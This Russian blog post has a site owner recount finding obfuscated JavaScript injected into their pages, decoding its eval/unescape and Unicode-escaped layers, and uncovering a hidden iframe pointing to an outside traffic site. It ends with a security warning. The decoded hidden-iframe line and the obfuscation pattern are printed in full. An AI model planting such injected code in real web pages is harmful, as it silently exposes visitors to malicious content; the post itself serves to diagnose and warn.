Чертовы барыги и их IFRAME трафик. Сегодня обнаружил, что на нескольких сайтах вылетают ошибки с сессиями и постоянно грузится какой-то левый сайт orentraff.cn.
Не долго ковырявшись в коде страниц обнаружил странный код:
<script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74."));
</script>
Спросил у другана что за команды eval и unescape. eval - Выполняет код, а unescape - конвертирует символы.
Заменив функцию EVAL на document.write. И открыв это в html документе я увидел еще один зашифрованный текст.
document.write('\u003c\u0069\u0066\u0072\u0061.');
Поковырявшись по форумам нашел топик, где парень столкнулся с той же проблемой, что я и. Оказалось \u003c это код символа в юникоде или в asci.
Затем я открыл этот гнусный код заменив в нем document.write на alert. И получил окошко сообщением, в котором и была волшебная строчка.
<iframe src="http://orentraff.cn/in.cgi?13" style="display:none"></iframe>
Гнусявый IFRAME. Судя по всему поломали один из моих сайтов и залили это добро кругом. Благо успел быстро вычистить и удалит бажный скрипт. Так что будьте аккуратны, следите за безопасностью своих сайтов. Иначе вас превратят в рассадник вирусов и копрофильской порнухи.
Написать комментарий